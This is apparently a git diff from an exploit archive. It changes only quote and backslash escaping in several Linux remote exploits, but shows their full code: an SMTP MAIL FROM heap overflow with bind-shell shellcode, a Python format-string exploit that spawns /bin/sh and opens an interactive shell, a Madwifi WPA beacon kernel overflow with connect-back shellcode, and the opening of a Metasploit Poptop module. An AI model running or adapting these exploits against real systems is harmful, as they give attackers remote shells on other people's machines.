*argv[]) { i_len=sizeof(sockadd); if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) { - err_exit("-> bind() error"); + err_exit(\"-> bind() error\"); } if (listen(s2,0)<0) { - err_exit("-> listen() error"); + err_exit(\"-> listen() error\"); } wait(); close(s1); - fprintf(stdout,"-> Waiting for connection....\n"); + fprintf(stdout,\"-> Waiting for connection....\\n\"); s1=accept(s2,(struct sockaddr *)&sockadd,&i_len); if (s1<0) { - err_exit("-> accept() error"); + err_exit(\"-> accept() error\"); } alarm(0); - fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr)); + fprintf(stdout,\"-> Connection from: %s\\n\",inet_ntoa(sockadd.sin_addr)); sendcmd(s1); doshell(s1); @@ -446,28 +446,28 @@ int main(int argc, char *argv[]) { else { if (send(s1,buf,buffsize,0)<0) { - err_exit("-> send() error"); + err_exit(\"-> send() error\"); } close(s1); - fprintf(stdout,"-> 'Connecting' mode...\n"); - fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n"); + fprintf(stdout,\"-> \'Connecting\' mode...\\n\"); + fprintf(stdout,\"-> Exploit string sent. Waiting for a shell...\\n\"); sleep(2); sockadd.sin_family = AF_INET; sockadd.sin_port = htons(s_port); if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) { - err_exit("-> socket() error"); + err_exit(\"-> socket() error\"); } if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { - fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n"); + fprintf(stdout,\"-> Exploit failed. Target probably segfaulted...\\n\\n\"); exit(0); } - fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port); + fprintf(stdout,\"-> Connecting to shell at %s:%d\\n\",inet_ntoa(sockadd.sin_addr),s_port); sendcmd(s1); doshell(s1); diff --git a/platforms/linux/remote/25275.c b/platforms/linux/remote/25275.c index b22b851d3..5ed10bcb6 100755 --- a/platforms/linux/remote/25275.c +++ b/platforms/linux/remote/25275.c @@ -26,29 +26,29 @@ This BID will be updated when more information becomes available. * * Notes: * - * You can't have any characters in overflow buffer that isspace() returns true + * You can\'t have any characters in overflow buffer that isspace() returns true * for. The shellcode is clear of them, but if your return address or retloc * has one you gotta figure out another one. My slack box has that situation, * heap is at 0x080d.. My gentoo laptop had no such problem and all was fine. I - * don't have anymore time to BS around with this and make perfect for any and - * all, b/c I've got exam to study for and Law and Order:CI is on in an hour. - * If the heap you're targetting is the same way, then try filling it up using - * some other commands. If the GOT you're targetting is at such address than - * overwrite a return address on the stack. Surely there's a way, check out the - * source and be creative; I'm sure there are some memory leaks somewhere you + * don\'t have anymore time to BS around with this and make perfect for any and + * all, b/c I\'ve got exam to study for and Law and Order:CI is on in an hour. + * If the heap you\'re targetting is the same way, then try filling it up using + * some other commands. If the GOT you\'re targetting is at such address than + * overwrite a return address on the stack. Surely there\'s a way, check out the + * source and be creative; I\'m sure there are some memory leaks somewhere you * can use to fill up heap as well. * * You might run into some ugliness trying to automate this for a couple * reasons. xmalloc() stores a cookie in front of buffer, and xfree() checks - * for this cookie before calling free(). So you're going to need that aligned + * for this cookie before calling free(). So you\'re going to need that aligned * properly unless you can cook up a way to exploit it when it bails out in * xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so * maybe you can be clever and do something there). Furthermore I found that * when trying to trigger this multiple times the alignment was different each - * time. There are "definitely" more reliable ways to exploit this if you take - * a deeper look into code which I don't have time to do right now. The padding + * time. There are \"definitely\" more reliable ways to exploit this if you take + * a deeper look into code which I don\'t have time to do right now. The padding * parameter controls the alignment and the size of the chunk being allocated. - * You'll probably have to play with it. Yes that's fugly. + * You\'ll probably have to play with it. Yes that\'s fugly. * * [n00b@crapbox.outernet] ./a.out * Usage: ./a.out < host > < padding > < retloc > < retaddr > @@ -67,11 +67,11 @@ This BID will be updated when more information becomes available. * * --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 * - * --{ Attempting to redefine the meaning of 'definitely' + * --{ Attempting to redefine the meaning of \'definitely\' * * --{ Got a shell * - * --{ Updating Webster's + * --{ Updating Webster\'s * --{ definitely, adv.: * --{ 1. See specious * @@ -110,7 +110,7 @@ This BID will be updated when more information becomes available. #define Z(x, len) memset((x), 0, (len)) #define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0) -#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args); +#define bye(fmt, args...) do{ fprintf(stderr, fmt\"\\n\", ##args); #exit(EXIT_FAILURE); }while(0) @@ -119,15 +119,15 @@ This BID will be updated when more information becomes available. #define SHELL_PORT 6969 #define NOP 0x90 char sc[] = -"\xeb\x0e""notexploitable" -"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x04\x24\x02\x89\xe6\xb0\x02" -"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50\x6a\x01\x6a\x02" -"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a\x10\x56\x50\x89\xe1\xb0" -"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x04\xcd" -"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89" -"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f" -"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x6b\x2c\x60\xcd" -"\x80"; +\"\\xeb\\x0e\"\"notexploitable\" +\"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x39\\xc6\\x04\\x24\\x02\\x89\\xe6\\xb0\\x02\" +\"\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\\x6a\\x01\\x6a\\x02\" +\"\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\\x10\\x56\\x50\\x89\\xe1\\xb0\" +\"\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\" +\"\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\" +\"\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\" +\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x6b\\x2c\\x60\\xcd\" +\"\\x80\"; /* a dlmalloc chunk descriptor */ @@ -148,7 +148,7 @@ ssize_t Send(int s, const void *buf, size_t len, int flags) n = send(s, buf, len, flags); if(n < 0) - die("send"); + die(\"send\"); return n; } @@ -160,7 +160,7 @@ ssize_t Recv(int s, void *buf, size_t len, int flags) n = recv(s, buf, len, flags); if(n < 0) - die("recv"); + die(\"recv\"); return n; } @@ -176,7 +176,7 @@ int conn(char *host, u_short port) hp = gethostbyname(host); if (hp == NULL) { - bye("gethostbyname failed with error %s", hstrerror(h_errno)); + bye(\"gethostbyname failed with error %s\", hstrerror(h_errno)); } sa.sin_family = AF_INET; sa.sin_port = htons(port); @@ -184,10 +184,10 @@ int conn(char *host, u_short port) sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) - die("socket"); + die(\"socket\"); if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) - die("connect"); + die(\"connect\"); return sock; } @@ -201,15 +201,15 @@ void shell(char *host, u_short port) sock = conn(host, port); - printf("--{ Got a shell\n\n" - "--{ Updating Webster's\n" - "--{ definitely, adv.:\n" - "--{ 1. See specious\n\n" - "--{ For the linguistically challenged...\n" - "--{ specious, adj. :\n" - "--{ 1. Having the ring of truth or plausibility but " - "actually fallacious\n" - "--{ 2. Deceptively attractive\n\n" + printf(\"--{ Got a shell\\n\\n\" + \"--{ Updating Webster\'s\\n\" + \"--{ definitely, adv.:\\n\" + \"--{ 1. See specious\\n\\n\" + \"--{ For the linguistically challenged...\\n\" + \"--{ specious, adj. :\\n\" + \"--{ 1. Having the ring of truth or plausibility but \" + \"actually fallacious\\n\" + \"--{ 2. Deceptively attractive\\n\\n\" ); FD_ZERO(&rfds); @@ -219,29 +219,29 @@ void shell(char *host, u_short port) FD_SET(sock, &rfds); if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1) - die("select"); + die(\"select\"); if (FD_ISSET(STDIN_FILENO, &rfds)) { l = read(0, buf, BS); if(l < 0) - die("read"); + die(\"read\"); else if(l == 0) - bye("\n - Connection closed by user\n"); + bye(\"\\n - Connection closed by user\\n\"); if (write(sock, buf, l) < 1) - die("write"); + die(\"write\"); } if (FD_ISSET(sock, &rfds)) { l = read(sock, buf, sizeof(buf)); if (l == 0) - bye("\n - Connection terminated.\n"); + bye(\"\\n - Connection terminated.\\n\"); else if (l < 0) - die("\n - Read failure\n"); + die(\"\\n - Read failure\\n\"); if (write(STDOUT_FILENO, buf, l) < 1) - die("write"); + die(\"write\"); } } } @@ -255,13 +255,13 @@ int parse_args(int argc, char **argv, char **host, int *npad, *host = argv[1]; - if(sscanf(argv[2], "%d", npad) != 1) + if(sscanf(argv[2], \"%d\", npad) != 1) return 1; - if(sscanf(argv[3], "%x", retloc) != 1) + if(sscanf(argv[3], \"%x\", retloc) != 1) return 1; - if(sscanf(argv[4], "%x", retaddr) != 1) + if(sscanf(argv[4], \"%x\", retaddr) != 1) return 1; return 0; @@ -279,35 +279,35 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr) /* read greeting */ n = Recv(sock, buf, BS, 0); if(n == 0) - bye("Server didn't even say hi"); + bye(\"Server didn\'t even say hi\"); /* send HELO */ - n = snprintf(buf, BS, "HELO localhost\r\n"); + n = snprintf(buf, BS, \"HELO localhost\\r\\n\"); Send(sock, buf, n, 0); Z(buf, BS); n = Recv(sock, buf, BS, 0); if(n == 0) - bye("Server didn't respond to HELO"); + bye(\"Server didn\'t respond to HELO\"); - printf("--{ Said HELO\n\n"); + printf(\"--{ Said HELO\\n\\n\"); /* * Build evil chunk overflow. The need to align chunk exactly makes this - * not so robust. In my short testing I wasn't able to get free() called - * directly on an area of memory we control. I'm sure you can though if you - * take some time to study process heap behavior. Note though that you'll + * not so robust. In my short testing I wasn\'t able to get free() called + * directly on an area of memory we control. I\'m sure you can though if you + * take some time to study process heap behavior. Note though that you\'ll * have to fill in the magic cookie field that xmalloc()/xfree() and some - * other functions use, so you'll still need to have it aligned properly + * other functions use, so you\'ll still need to have it aligned properly * which defeats the whole purpose. This exploits the free() call on the * buffer we overflow, so you have to align the next chunk accordingly. * Anyhow on newest glibc there is a check for negative size field on the * chunk being freed, and program dies if it is negative (the exact * condition is not negative, but it has that effect pretty much, but go - * look yourself ;)), So the techniques outlined by gera in phrack don't + * look yourself ;)), So the techniques outlined by gera in phrack don\'t * work (being able to point all chunks at our two evil chunks). Check out - * most recent glibc code in _int_free() if you haven't already. + * most recent glibc code in _int_free() if you haven\'t already. */ - memset(pad, 'A', npad); + memset(pad, \'A\', npad); chunk.dummy = CHUNKSZ; chunk.prevsz = CHUNKSZ; @@ -318,20 +318,20 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr) evil[CHUNKLEN] = 0; /* send the overflow */ - n = snprintf(buf, BS, "MAIL FROM: %s%s\n", pad, evil, sc); + n = snprintf(buf, BS, \"MAIL FROM: %s%s\\n\", pad, evil, sc); Send(sock, buf, n, 0); Z(buf, BS); - printf("--{ Sent MAIL FROM overflow\n\n"); + printf(\"--{ Sent MAIL FROM overflow\\n\\n\"); #define SLEEP_TIME 15 setbuf(stdout, NULL); - printf("--{ Going for shell in "); + printf(\"--{ Going for shell in \"); for(n = 0; n < SLEEP_TIME; n++){ - printf("%d ", SLEEP_TIME-n); + printf(\"%d \", SLEEP_TIME-n); sleep(1); } - puts("\n"); + puts(\"\\n\"); } @@ -344,21 +344,21 @@ int main(int argc, char **argv) char *host = NULL; if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr)) - bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]); + bye(\"Usage: %s < host > < padding > < retloc > < retaddr >\\n\", argv[0]); - printf("--{ Smack 1.oohaah\n\n"); + printf(\"--{ Smack 1.oohaah\\n\\n\"); sock = conn(host, SMTP_PORT); - printf("--{ definitely, adv.:\n" - "--{ 1. Having distinct limits\n" - "--{ 2. Indisputable; certain\n" - "--{ 3. Clearly defined; explicitly precise\n\n" + printf(\"--{ definitely, adv.:\\n\" + \"--{ 1. Having distinct limits\\n\" + \"--{ 2. Indisputable; certain\\n\" + \"--{ 3. Clearly defined; explicitly precise\\n\\n\" ); sploit(sock, npad, retloc, retaddr); - printf("--{ Attempting to redefine the meaning of 'definitely'\n\n"); + printf(\"--{ Attempting to redefine the meaning of \'definitely\'\\n\\n\"); shell(host, SHELL_PORT); diff --git a/platforms/linux/remote/307.py b/platforms/linux/remote/307.py index 92702125d..0ab739fa0 100755 --- a/platforms/linux/remote/307.py +++ b/platforms/linux/remote/307.py @@ -17,18 +17,18 @@ pad = 2 #0000000F FFE1 jmp ecx # read(4, esp, -1); jmp ecx -lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1" -lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc +lnx_readsc = \"\\x31\\xdb\\xf7\\xe3\\xb0\\x03\\x80\\xc3\\x04\\x89\\xe1\\x4a\\xcd\\x80\\xff\\xe1\" +lnx_stage_one = \"\\x90\" * (23 - len(lnx_readsc)) + lnx_readsc # dup2 shellcode(4->0,1,2) -lnx_stage_two = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04" -lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80" +lnx_stage_two = \"\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\xb2\\x3f\\x88\\xd0\\xb3\\x04\" +lnx_stage_two += \"\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\" # execute /bin/sh -lnx_stage_two += "\x90" * 100 -lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68" -lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89" -lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80" +lnx_stage_two += \"\\x90\" * 100 +lnx_stage_two += \"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\" +lnx_stage_two += \"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\" +lnx_stage_two += \"\\xe1\\x8d\\x42\\x0b\\xcd\\x80\" -targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ] +targets = [ [ 0 ], [ \"Compiled test platform\", 0x0804c418, 0xbffff9e8 ] ] bruteforce = 0 @@ -37,13 +37,13 @@ self.host = host self.port = port set = 0 -if(os == "linux"): +if(os == \"linux\"): set = 1 self.stage_one = self.lnx_stage_one self.stage_two = self.lnx_stage_two if(set == 0): -print "Unknown OS" +print \"Unknown OS\" os._exit() self.os = os @@ -74,48 +74,48 @@ self.fd.connect((self.host, self.port)) def exploit(self, where, what): if(not self.fd or self.fd is None): self.connect() -self.already_written = len('gethostbyname(') +self.already_written = len(\'gethostbyname(\') -#print "# of nops: %d\n" % (23 - len(self.readsc)) +#print \"# of nops: %d\\n\" % (23 - len(self.readsc)) -exploit = "x" * self.pad +exploit = \"x\" * self.pad self.already_written += self.pad -exploit += struct.pack("> 16) -fill = "%1$" + str(l) + "u" +fill = \"%1$\" + str(l) + \"u\" exploit += fill -exploit += "%8$hn" +exploit += \"%8$hn\" -#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit)) -#print "[*] Stage 1 length: %d" % len(self.stage_one) +#print \"[*] Format string: (%s) Len: %d\" % (exploit, len(exploit)) +#print \"[*] Stage 1 length: %d\" % len(self.stage_one) #time.sleep(5) try: -self.fd.send(exploit + self.stage_one + "\n") +self.fd.send(exploit + self.stage_one + \"\\n\") self.fd.send(self.stage_two) time.sleep(1) -self.fd.send("echo spawned; uname -a; id -a;\n") -print "Recieved: " + self.fd.recv(1024) +self.fd.send(\"echo spawned; uname -a; id -a;\\n\") +print \"Recieved: \" + self.fd.recv(1024) except: self.fd.close() self.fd = None -print "\tFailed @ 0x%08x" % what +print \"\\tFailed @ 0x%08x\" % what return 0 remote = telnetlib.Telnet() remote.sock = self.fd -print "[*] You should now have a shell" +print \"[*] You should now have a shell\" remote.interact() os.exit(0) @@ -125,23 +125,23 @@ r.exploit(where, i) def run(self): if(self.bruteforce): -print "Bruteforcing.." -#print "not implemented yet" +print \"Bruteforcing..\" +#print \"not implemented yet\" #os._exit(1) for i in range(0x0804c000, 0x0804d000, 0x100 / 6): -print "Trying: 0x%08x" % i +print \"Trying: 0x%08x\" % i self.force(i, 0xbffffa00, 0xbffff9c0) #self.exploit(self.args[1], self.args[2]) -if __name__ == '__main__': +if __name__ == \'__main__\': if(len(sys.argv) != 4): -print "%s host [linux] targetid" -print "- 0 to brute force" -print "- 1 custom compile" +print \"%s host [linux] targetid\" +print \"- 0 to brute force\" +print \"- 1 custom compile\" os._exit(0) -print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3]) +print \"%s-%s-%s\" % (sys.argv[1], sys.argv[2], sys.argv[3]) r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3])) #r.exploit(0x0804c418, 0xbffff9e8) #r.force(0x0804c418, 0xbffffa00, 0xbffff800) diff --git a/platforms/linux/remote/3389.c b/platforms/linux/remote/3389.c index c3bcb6310..6356212b1 100755 --- a/platforms/linux/remote/3389.c +++ b/platforms/linux/remote/3389.c @@ -9,7 +9,7 @@ * .... * .... * the function re-uses args in the stack before returning so we - * can't trash them overwriting. + * can\'t trash them overwriting. * Different compiled module [ex. different version of gcc] may require * a different pad value.. (see -g option) * @@ -130,69 +130,69 @@ unsigned int pad_space = PAD_SPACE; #define SUB_OFFSET_PATCH 8 char ring0_code[]= - "\xe8\x00\x00\x00\x00" //call 8048359 - "\x5e" //pop %esi - "\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */ - "\x31\xc0" //xor %eax,%eax - "\xb0\x04" //mov $0x4,%al - "\x01\xc4" //add %eax,%esp - "\x83\x3c\x24\x73" //cmp $0x73,%esp - "\x75\xf8" //jne 8048364 - "\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp) - "\x75\xf1" //jne 8048364 - "\x29\xc4" //sub %eax,%esp - "\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi - "\x89\x3c\x24" //mov %edi,(%esp) - "\x31\xc9" //xor %ecx,%ecx - "\xb1\x5b" //mov $0x5b,%cl /* FIX */ - "\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi) - "\xcf"; //iret + \"\\xe8\\x00\\x00\\x00\\x00\" //call 8048359 + \"\\x5e\" //pop %esi + \"\\x81\\xee\\x88\\x00\\x00\\x00\" //sub $0x88,%esi /* PATCH */ + \"\\x31\\xc0\" //xor %eax,%eax + \"\\xb0\\x04\" //mov $0x4,%al + \"\\x01\\xc4\" //add %eax,%esp + \"\\x83\\x3c\\x24\\x73\" //cmp $0x73,%esp + \"\\x75\\xf8\" //jne 8048364 + \"\\x83\\x7c\\x24\\x0c\\x7b\" //cmpl $0x7b,0xc(%esp) + \"\\x75\\xf1\" //jne 8048364 + \"\\x29\\xc4\" //sub %eax,%esp + \"\\x8b\\x7c\\x24\\x0c\" //mov 0xc(%esp),%edi + \"\\x89\\x3c\\x24\" //mov %edi,(%esp) + \"\\x31\\xc9\" //xor %ecx,%ecx + \"\\xb1\\x5b\" //mov $0x5b,%cl /* FIX */ + \"\\xf3\\xa4\" //rep movsb %ds:(%esi),%es:(%edi) + \"\\xcf\"; //iret /* connect back */ #define IP_OFFSET 35 #define PORT_OFFSET 44 char u_code[] = -"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */ -"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d" -"\xbe" -"\xf5\xff\xff\xfe" // ~ip -"\xf7\xd6\x56\x66\xbd" -"\x69\x7a" // port -"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9" -"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68" -"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf"; +\"\\x31\\xc0\\x89\\xc3\\x40\\x40\\xcd\\x80\\x39\\xc3\\x74\\x03\\x31\\xc0\\x40\\xcd\\x80\" /* fork */ +\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x5b\\x5d\" +\"\\xbe\" +\"\\xf5\\xff\\xff\\xfe\" // ~ip +\"\\xf7\\xd6\\x56\\x66\\xbd\" +\"\\x69\\x7a\" // port +\"\\x0f\\xcd\\x09\\xdd\\x55\\x43\\x6a\\x10\\x51\\x50\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x87\\xd9\" +\"\\x5b\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\" +\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\xeb\\xdf\"; /* 802.11header + WPA IE prolog */ #define WPA_LEN_OFFSET 55 #define CHANNEL 11 char beacon_80211_wpa[] = -"\x80" // management frame / subtype beacon -"\x00" // flags -"\x00\x00" // duration -"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr -"\xCC\xCC\xCC\xCC\xCC\xCC" // src address -"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid -"\x00\x00" // seq -"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp -"\x64\x00" // interval -"\x01\x00" // caps -"\x00\x03\x41\x41\x41" // ssid Information Element -"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element -"\x03\x01\x0B" // channel Information Element (11) -"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */ -"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len) +\"\\x80\" // management frame / subtype beacon +\"\\x00\" // flags +\"\\x00\\x00\" // duration +\"\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\" // destination addr +\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\" // src address +\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\" // bbsid +\"\\x00\\x00\" // seq +\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // timestamp +\"\\x64\\x00\" // interval +\"\\x01\\x00\" // caps +\"\\x00\\x03\\x41\\x41\\x41\" // ssid Information Element +\"\\x01\\x08\\x82\\x84\\x8b\\x96\\x0c\\x18\\x30\\x48\" // rates Information Element +\"\\x03\\x01\\x0B\" // channel Information Element (11) +\"\\xdd\\xc6\" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */ +\"\\x00\\x50\\xf2\\x01\\x01\\x00\"; // oui + type + version (first 6 byte of len) #define JUMP_OFFSET_PATCH 1 -char jmp_back[]="\xeb\x00"; +char jmp_back[]=\"\\xeb\\x00\"; /* ----------------------------------- */ void usage(char *prog) { - printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog); + printf(\"[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\\n\", prog); } unsigned char *build_frame() @@ -203,10 +203,10 @@ unsigned char *build_frame() unsigned int hsb = sizeof(ring0_code)-1; unsigned int lsb = SHELLCODE_SPACE - hsb; - printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n", + printf(\"[*][low-kcode]: %d\\n[*][high-ucode]: %d\\n\", lsb, hsb); - printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n", + printf(\"[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\\n\", sizeof(u_code)-1, sizeof(ring0_code)-1); /* fix jump */ @@ -217,11 +217,11 @@ unsigned char *build_frame() unsigned int sub = 5 + (sizeof(u_code)-1); FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub); - printf("[*][payload space]: %d\n", PAYLOAD_SPACE); + printf(\"[*][payload space]: %d\\n\", PAYLOAD_SPACE); /* fix beacon_80211_wpa: WPA len */ FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6); - printf("[*][beacon_WPA_IE_lenght]: %u\n", + printf(\"[*][beacon_WPA_IE_lenght]: %u\\n\", (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]); /* fill frame */ @@ -256,43 +256,43 @@ unsigned char *build_frame() void print_frame(unsigned char *frame, unsigned int size) { int i; - printf("\n[printing frame - start]\n "); + printf(\"\\n[printing frame - start]\\n \"); for(i=1; i<=size; i++) { - printf("%02x ", frame[i-1]); + printf(\"%02x \", frame[i-1]); if((i % 16) == 0) - printf("\n "); + printf(\"\\n \"); } - printf("\n[printing frame - end]\n"); + printf(\"\\n[printing frame - end]\\n\"); } void parse_arg(int argc, char **argv) { int opt; struct in_addr in; - while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF) + while( (opt=getopt(argc, argv, \"j:i:a:p:d:g:\")) != EOF) { switch(opt) { - case 'j': + case \'j\': jmp_address = strtoll(optarg, NULL, 16); break; - case 'a': + case \'a\': ip = strdup(optarg); inet_aton(ip, &in); FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr)); break; - case 'p': + case \'p\': port = atoi(optarg); FIX_WORD(u_code, PORT_OFFSET, port); break; - case 'd': + case \'d\': driver = strdup(optarg); break; - case 'i': + case \'i\': iface = strdup(optarg); break; - case 'g': + case \'g\': pad_space = atoi(optarg); break; default: @@ -318,10 +318,10 @@ int main(int argc, char *argv[]) exit(1); } - printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu antifork.org\n" - "-------------------- **** ------------------\n" - "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n" - "-------------------- **** ------------------\n\n", + printf( \"\\n\\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\\n\\t exploit code: sgrakkyu antifork.org\\n\" + \"-------------------- **** ------------------\\n\" + \"[opt-ip]: %s\\n[opt-port]: %d\\n[opt-iface]: %s\\n[opt-driver]: %s\\n[opt-jump]: 0x%08x\\n[pad]: %d\\n\" + \"-------------------- **** ------------------\\n\\n\", ip, port, iface, driver, jmp_address, pad_space); unsigned char *frame = build_frame(); @@ -333,30 +333,30 @@ int main(int argc, char *argv[]) /* Validate the driver name specified */ if (drivertype == INJ_NODRIVER) { - fprintf(stderr, "Driver name not recognized.\n"); + fprintf(stderr, \"Driver name not recognized.\\n\"); return -1; } if (tx80211_init(&in_tx, iface, drivertype) < 0) { - fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]); + fprintf(stderr, \"Error initializing drive \\\"%s\\\".\\n\", argv[1]); return -1; } if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0) { - fprintf(stderr, "Driver does not support transmitting control frames.\n"); + fprintf(stderr, \"Driver does not support transmitting control frames.\\n\"); return -1; } if (tx80211_setchannel(&in_tx, CHANNEL) < 0) { - fprintf(stderr, "Error setting channel.\n"); + fprintf(stderr, \"Error setting channel.\\n\"); return 1; } if (tx80211_open(&in_tx) < 0) { - fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname); + fprintf(stderr, \"Unable to open interface %s.\\n\", in_tx.ifname); return 1; } @@ -364,15 +364,15 @@ int main(int argc, char *argv[]) in_packet.packet = frame; in_packet.plen = TOTAL_PACKET_LEN; - printf("[sending packets]: about 10 a second\n"); + printf(\"[sending packets]: about 10 a second\\n\"); while(i < 10000) { /* Transmit the packet */ if (tx80211_txpacket(&in_tx, &in_packet) < 0) { - fprintf(stderr, "Unable to transmit packet.\n"); - perror("txpacket"); + fprintf(stderr, \"Unable to transmit packet.\\n\"); + perror(\"txpacket\"); return 1; } i++; diff --git a/platforms/linux/remote/9952.rb b/platforms/linux/remote/9952.rb index b558a7136..c4bfa73ef 100755 --- a/platforms/linux/remote/9952.rb +++ b/platforms/linux/remote/9952.rb @@ -10,7 +10,7 @@ ## -require 'msf/core' +require \'msf/core\' class Metasploit3 < Msf::Exploit::Remote @@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Poptop Negative Read Overflow', - 'Description' => %q{ + \'Name\' => \'Poptop Negative Read Overflow\', + \'Description\' => %q{ This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to 